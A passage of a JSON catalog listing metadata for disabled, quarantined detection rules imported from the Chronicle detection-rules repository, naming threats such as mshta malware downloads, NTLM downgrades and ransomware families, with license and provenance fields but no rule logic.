"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mmc20_lateral_movement.yaral" } }, { "id": "chronicle-detection-rules-modification-of-windows-defender-service-settings-sysmon", "type": "detection", "name": "modification_of_windows_defender_service_settings_sysmon", "description": "modification_of_windows_defender_service_settings_sysmon", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/modification-of-windows-defender-service-settings-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "modification_of_windows_defender_service_settings_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/modification_of_windows_defender_service_settings__sysmon.yaral" } }, { "id": "chronicle-detection-rules-modify-user-shell-folders-startup-value", "type": "detection", "name": "modify_user_shell_folders_startup_value", "description": "modify_user_shell_folders_startup_value", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/modify-user-shell-folders-startup-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "modify_user_shell_folders_startup_value", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/modify_user_shell_folders_startup_value.yaral" } }, { "id": 
"chronicle-detection-rules-monero-mining-detector", "type": "detection", "name": "monero_mining_detector", "description": "monero_mining_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/monero-mining-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "monero_mining_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/monero_mining_detector.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-application-endpoint-requests", "type": "detection", "name": "ms_graph_application_endpoint_requests", "description": "ms_graph_application_endpoint_requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-application-endpoint-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_application_endpoint_requests", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/microsoft/graph_activity/ms_graph_application_endpoint_requests.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-authorization-policy", "type": "detection", "name": "ms_graph_authorization_policy", "description": "ms_graph_authorization_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-authorization-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_authorization_policy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_authorization_policy.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-delete-method", "type": "detection", "name": "ms_graph_delete_method", "description": "ms_graph_delete_method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-delete-method.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_delete_method", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/community/microsoft/graph_activity/ms_graph_delete_method.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-enumerate-applications", "type": "detection", "name": "ms_graph_enumerate_applications", "description": "ms_graph_enumerate_applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-enumerate-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_enumerate_applications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_enumerate_applications.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-estimate-access", "type": "detection", "name": "ms_graph_estimate_access", "description": "ms_graph_estimate_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-estimate-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_estimate_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", 
"imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_estimate_access.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-failed-file-downloads-multiple-attempts", "type": "detection", "name": "ms_graph_failed_file_downloads_multiple_attempts", "description": "ms_graph_failed_file_downloads_multiple_attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-failed-file-downloads-multiple-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_failed_file_downloads_multiple_attempts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_failed_file_downloads_multiple_attempts.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-failed-file-downloads-uniq-docs", "type": "detection", "name": "ms_graph_failed_file_downloads_uniq_docs", "description": "ms_graph_failed_file_downloads_uniq_docs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-failed-file-downloads-uniq-docs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "ms_graph_failed_file_downloads_uniq_docs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_failed_file_downloads_uniq_docs.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-graphrunner-graphrecon-enumeration", "type": "detection", "name": "ms_graph_graphrunner_graphrecon_enumeration", "description": "ms_graph_graphrunner_graphrecon_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-graphrunner-graphrecon-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_graphrunner_graphrecon_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_graphrunner_graphrecon_enumeration.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-group-bad-request", "type": "detection", "name": "ms_graph_group_bad_request", "description": "ms_graph_group_bad_request", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-group-bad-request.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_group_bad_request", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_group_bad_request.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-group-creation-success", "type": "detection", "name": "ms_graph_group_creation_success", "description": "ms_graph_group_creation_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-group-creation-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_group_creation_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_group_creation_success.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-groups-endpoint-requests", "type": "detection", "name": "ms_graph_groups_endpoint_requests", "description": "ms_graph_groups_endpoint_requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/ms-graph-groups-endpoint-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_groups_endpoint_requests", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_groups_endpoint_requests.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-search-query", "type": "detection", "name": "ms_graph_search_query", "description": "ms_graph_search_query", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-search-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_search_query", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_search_query.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-security-open-inbox-enumeration", "type": "detection", "name": "ms_graph_security_open_inbox_enumeration", "description": "ms_graph_security_open_inbox_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", 
"tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-security-open-inbox-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_security_open_inbox_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_security_open_inbox_enumeration.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-updatable-groups-enumeration", "type": "detection", "name": "ms_graph_updatable_groups_enumeration", "description": "ms_graph_updatable_groups_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-updatable-groups-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_updatable_groups_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_updatable_groups_enumeration.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-user-endpoint-requests", "type": "detection", "name": "ms_graph_user_endpoint_requests", "description": "ms_graph_user_endpoint_requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-user-endpoint-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_user_endpoint_requests", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_user_endpoint_requests.yaral" } }, { "id": "chronicle-detection-rules-ms-office-product-spawning-exe-in-user-dir", "type": "detection", "name": "ms_office_product_spawning_exe_in_user_dir", "description": "ms_office_product_spawning_exe_in_user_dir", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-office-product-spawning-exe-in-user-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_office_product_spawning_exe_in_user_dir", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/ms_office_product_spawning_exe_in_user_dir.yaral" } }, { "id": "chronicle-detection-rules-mshta-downloads-malware-by-using-covid19-themed-document", "type": "detection", "name": 
"mshta_downloads_malware_by_using_covid19_themed_document", "description": "mshta_downloads_malware_by_using_covid19_themed_document", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mshta-downloads-malware-by-using-covid19-themed-document.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mshta_downloads_malware_by_using_covid19_themed_document", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/mshta_downloads_malware_by_using_covid_19_themed_document.yaral" } }, { "id": "chronicle-detection-rules-mshta-spwaned-by-svchost-as-seen-in-lethalhta-sysmon", "type": "detection", "name": "mshta_spwaned_by_svchost_as_seen_in_lethalhta_sysmon", "description": "mshta_spwaned_by_svchost_as_seen_in_lethalhta_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mshta-spwaned-by-svchost-as-seen-in-lethalhta-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mshta_spwaned_by_svchost_as_seen_in_lethalhta_sysmon", "source_commit": "74dd490", "license": 
"Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/mshta_spwaned_by_svchost_as_seen_in_lethalhta__sysmon.yaral" } }, { "id": "chronicle-detection-rules-msiexec-web-install", "type": "detection", "name": "msiexec_web_install", "description": "msiexec_web_install", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/msiexec-web-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "msiexec_web_install", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/msiexec_web_install.yaral" } }, { "id": "chronicle-detection-rules-mssql-server-backdoor-detection-vollgar", "type": "detection", "name": "mssql_server_backdoor_detection_vollgar", "description": "mssql_server_backdoor_detection_vollgar", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mssql-server-backdoor-detection-vollgar.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "mssql_server_backdoor_detection_vollgar", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/ms_sql_server_backdoor_detection__vollgar.yaral" } }, { "id": "chronicle-detection-rules-muddywater-apt-proxy", "type": "detection", "name": "muddywater_apt_proxy", "description": "muddywater_apt_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/muddywater-apt-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "muddywater_apt_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/muddywater_apt__proxy.yaral" } }, { "id": "chronicle-detection-rules-mustang-panda-dropper", "type": "detection", "name": "mustang_panda_dropper", "description": "mustang_panda_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mustang-panda-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "mustang_panda_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/mustang_panda_dropper.yaral" } }, { "id": "chronicle-detection-rules-mustangpanda-covid19-campaing", "type": "detection", "name": "mustangpanda_covid19_campaing", "description": "mustangpanda_covid19_campaing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mustangpanda-covid19-campaing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mustangpanda_covid19_campaing", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mustangpanda_covid_19_campaing.yaral" } }, { "id": "chronicle-detection-rules-mydoom-email-worm-detector-sysmon-behavior", "type": "detection", "name": "mydoom_email_worm_detector_sysmon_behavior", "description": "mydoom_email_worm_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mydoom-email-worm-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mydoom_email_worm_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/mydoom_email_worm_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-nanocore-rat-loaded-by-covid19-update-xlsm-file", "type": "detection", "name": "nanocore_rat_loaded_by_covid19_update_xlsm_file", "description": "nanocore_rat_loaded_by_covid19_update_xlsm_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/nanocore-rat-loaded-by-covid19-update-xlsm-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "nanocore_rat_loaded_by_covid19_update_xlsm_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/nanocore_rat_loaded_by_covid_19_update_xlsm_file.yaral" } }, { "id": "chronicle-detection-rules-nemty-ransomware-lolbins-abuse", "type": "detection", "name": "nemty_ransomware_lolbins_abuse", "description": "nemty_ransomware_lolbins_abuse", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/nemty-ransomware-lolbins-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "nemty_ransomware_lolbins_abuse", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/nemty_ransomware__lolbins_abuse.yaral" } }, { "id": "chronicle-detection-rules-nemty-successor-nefilimnephilim-ransomware", "type": "detection", "name": "nemty_successor_nefilimnephilim_ransomware", "description": "nemty_successor_nefilimnephilim_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/nemty-successor-nefilimnephilim-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "nemty_successor_nefilimnephilim_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/nemty_successor__nefilim_nephilim_ransomware.yaral" } }, { "id": "chronicle-detection-rules-net-ipc-share-sysmon", "type": "detection", "name": "net_ipc_share_sysmon", "description": "net_ipc_share_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/net-ipc-share-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "net_ipc_share_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/net_ipc_share__sysmon.yaral" } }, { "id": "chronicle-detection-rules-netexe-execution", "type": "detection", "name": "netexe_execution", "description": "netexe_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netexe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netexe_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/net_exe_execution.yaral" } }, { "id": "chronicle-detection-rules-netntlm-downgrade-attack", "type": "detection", "name": "netntlm_downgrade_attack", "description": "netntlm_downgrade_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netntlm-downgrade-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netntlm_downgrade_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/netntlm_downgrade_attack_part_1.yaral" } }, { "id": "chronicle-detection-rules-netntlm-downgrade-attack-part-1", "type": "detection", "name": "netntlm_downgrade_attack_part_1", "description": "netntlm_downgrade_attack_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 